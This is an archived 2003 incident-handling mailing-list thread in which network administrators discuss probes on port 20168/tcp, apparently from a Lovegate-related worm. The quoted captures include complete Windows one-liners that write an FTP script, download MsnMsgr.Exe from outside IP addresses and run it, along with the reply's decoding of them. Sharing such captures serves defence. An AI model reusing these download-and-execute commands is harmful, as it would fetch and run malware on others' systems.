FW: New Worm or Worm Variant?

From: Bassett, Mark (mbassett_at_omaha.com)
Date: 12/11/03

  • Next message: Juri Haberland: "Re: New Worm or Worm Variant?"
    Date: Thu, 11 Dec 2003 12:22:02 -0600
    To: <incidents@securityfocus.com>
    
    

    Looks to me like its building the wxtu.dll after it initializes
    connection.

    And then it uses that built file as a command input to ftp.
    So its doing ftp -n
     
    With input from wxtu.dll which is below

    open 211.26.130.118
    USER noxe
    Noxe
    Binary
    Get MsnMsgr.exe
    bye

    so it is just a simple ftp script to download an exploit.

    Mark Bassett
    Network Administrator
    World media company
    Omaha.com
    402-898-2079

    -----Original Message-----
    From: Charles Hamby [mailto:fixer@gci.net]
    Sent: Wednesday, December 10, 2003 1:36 PM
    To: incidents@securityfocus.com
    Subject: New Worm or Worm Variant?

    I've been seeing a jump in 20168/tcp scans over the past week or so.
    This port is commonly associated with the Lovegate worm. I recently set
    up a port listener using Netcat to capture
    any output from probes against a couple of my systems. Shown below are
    the results:

    echo open 211.26.130.118 >> wxtu.dll & echo USER noxe >> wxtu.dll & echo
    noxe >> wxtu.dll & echo binary >> wxtu.dll & echo get MsnMsgr.Exe >>
    wxtu.dll & echo bye >> wxtu.dll & ftp -n -s:wxtu.dll & del wxtu.dll &
    start MsnMsgr.Exe

    echo open 211.26.132.172 >> wxtu.dll & echo USER noxe >> wxtu.dll & echo
    noxe >> wxtu.dll & echo binary >> wxtu.dll & echo get MsnMsgr.Exe >>
    wxtu.dll & echo bye >> wxtu.dll & ftp -n -s:wxtu.dll & del wxtu.dll &
    start MsnMsgr.Exe

    At first glance it looks like some sort of non-interactive FTP session
    to download an exploit (MsnMsgr.Exe), but Googling for wxtu.dll came up
    empty (so this could be anything from a real .dll to a renamed
    executable in my mind). A couple of questions for the world at large:

    1) Has anyone run across anything like this before? This looks like
    something automated to me. Worm script, perhaps. The IP I set up the
    port listener on had roughly 20+ probes on 20168/tcp from noon yesterday
    to 7am this morning.

    2) Any theories on wxtu.dll? Since I can't get a hold of the malware to
    analyze it, I'm really guessing at this point. MsnMsgr.Exe seems to be
    the exploit itself, it it appears to be using something like FTPCOM to
    do a non-interactive FTP session, but wxtu.dll could be anything from a
    real .dll file to a renamed executable. Ideas?

    -cdh

    ------------------------------------------------------------------------

    ---
    ------------------------------------------------------------------------
    ----
    ************************************************************
    Omaha World-Herald Company computer systems are for business use only.
    This e-mail was scanned by MailSweeper
    ************************************************************
    ---------------------------------------------------------------------------
    ----------------------------------------------------------------------------
    

  • Next message: Juri Haberland: "Re: New Worm or Worm Variant?"

    Relevant Pages

    • Re: [Full-Disclosure] smarter dcom worm
      ... imho netbios and tftp are good enough transport and better then ftp since ... why did this worm carry around a dummy tftp server? ... > NetBIOS is available as a transport method natively in the target OS. ...
      (Full-Disclosure)
    • RE: [Full-Disclosure] smarter dcom worm
      ... Subject: smarter dcom worm ... imho netbios and tftp are good enough transport and better then ftp since ... why did this worm carry around a dummy tftp server? ... > NetBIOS is available as a transport method natively in the target OS. ...
      (Full-Disclosure)